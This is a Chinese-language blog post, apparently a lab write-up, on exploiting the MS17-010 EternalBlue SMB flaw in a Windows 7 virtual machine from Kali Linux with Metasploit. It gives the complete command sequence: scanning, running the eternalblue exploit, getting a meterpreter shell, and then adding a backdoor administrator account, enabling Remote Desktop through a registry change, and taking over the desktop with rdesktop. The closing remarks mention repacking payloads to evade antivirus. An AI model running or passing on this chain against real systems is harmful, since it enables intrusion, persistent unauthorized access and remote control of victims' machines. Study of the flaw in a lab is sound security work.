永恒之蓝ms17-010漏洞利用(提取meterpreter权限获取shell,进入windows 远程操控主机)

一、漏洞原理

1、永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
2、SMB服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无。
-----想了解SMB具体漏洞原理可以点击链接: NSA Eternalblue SMB 漏洞分析.

二、需要工具

1、windows系统(靶机)
我这里使用的是在虚拟机里新建的win7系统
2、kali linux系统(攻击机)
我这里使用的是kali2020版本

三、漏洞验证

1、进入win7的cmd里查看windows系统的IP地址为:192.168.60.137
宇宙小天才

2、打开kali—漏洞利用工具集—metasploit framework,双击进入在这里插入图片描述
3、等工具自己跑完后,成功进入msf,就可以敲命令啦
在这里插入图片描述

4、使用auxiliary/scanner/smb/smb_ms17_010模块(主要是为了扫描看目标靶机是否存在ms17-010漏洞)

msf5 > use auxiliary/scanner/smb/smb_ms17_010

5、查看auxiliary/scanner/smb/smb_ms17_010模块的配置信息

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

运行后会显示auxiliary/scanner/smb/smb_ms17_010模块的所有配置信息
在这里插入图片描述

6、在扫描模块里设置win7靶机的IP:192.168.60.137

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.60.137

运行后会自动返回rhost→192.168.60.137
在这里插入图片描述

7、设置完成后,模块对目标靶机进行扫描

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

显然,扫描并未显示出现ms17-010漏洞
在这里插入图片描述
这是因为防火墙给挡住了,接下来将防火墙关闭,在运行下试试
在这里插入图片描述
可以看到,把防火墙关闭后,重新扫描出了ms17-010漏洞,所以win7靶机存在“永恒之蓝”漏洞
在这里插入图片描述

四、漏洞攻击

1、搜索ms17-010漏洞利用模块

msf5 auxiliary(scanner/smb/smb_ms17_010) > search ms17-010

会显示所有ms17-010漏洞可以利用的模块信息
在这里插入图片描述
2、使用auxiliary(scanner/smb/smb_ms17_010)模块(进行攻击)

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

3、查看auxiliary(scanner/smb/smb_ms17_010)模块的配置信息

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

会显示auxiliary(scanner/smb/smb_ms17_010)模块的所有配置信息
在这里插入图片描述
4、接下来,在攻击模块里设置win7靶机的IP

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.60.137

运行后会自动返回rhost→192.168.60.137
在这里插入图片描述
5、使用exploit或run命令进行攻击

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

运行结束后,获取到了meterpreter权限
在这里插入图片描述

6、在meterpreter权限中直接获取shell

meterpreter > shell

可以看到成功获取了win7的权限,可以进行操作了
在这里插入图片描述

五、漏洞利用

1、首先我们来创建用户

C:\Windows\system32>net user lfn 123456 /add

我们去靶机上看看,发现了我们新增的用户,但是如果没有管理员权限,是没有办法进行远程连接的,也就是说,我们没办法在kali上打开win7靶机的远程操作界面

2、给我们的用户增加管理员权限,让它可以有远程控制的权限

C:\Windows\system32>net localgroup administrators lfn /add

我们再去靶机上看看,发现了我们新增的用户,已经有了管理员权限,可以进行远程连接了
在这里插入图片描述

3、用kali把win7靶机远程桌面服务打开

C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

4、在kali终端,使用添加的管理员账户lfn进行远程桌面

root@kali:~# rdesktop 192.168.60.137:3389

会自动弹出win7的界面窗口
在这里插入图片描述
如果我们直接进行登陆的话,win7靶机那边就会掉线
在这里插入图片描述
而且进行远程连接时,必须要win7那边确认或者是win7默认不选择等待30秒才能建立连接
在这里插入图片描述
30秒后,win7靶机就会如下图所示,可以看到主机被kali远程执行
在这里插入图片描述
30秒后,kali界面就会如下图所示,可以看到win7靶机的界面,并且可以进行任意操作了

在这里插入图片描述

六、最后的话

最近在学习The-Hacker-Playbook-3这本书,书中介绍的红队的第一个核心工具:Metasploit 框架,尽管 Metasploit 框架从 2003 年开发的,但它现在仍然是一个非常棒的工具。有最初的开发者 H.D. Moore 和非常活跃的社区为它提供持续支持。这个社区的驱动的框架,拥有着所有最新的公开漏洞的利用、后渗透利用模块、辅助模块等等。对于红队项目,我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统,以获得我们的第一个内网 shell,或者我们可能使用 Metasploit 为我们的社会工程攻击生成一个 Meterpreter payload。当然也可以重新编译 Metasploit payload 绕过杀毒软件和网络监控。这是个人对永恒之蓝ms17-010漏洞利用的学习总结,分享给大家一起学习,也希望大家多给一些批评建议!我会虚心学习的!加油✌*

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值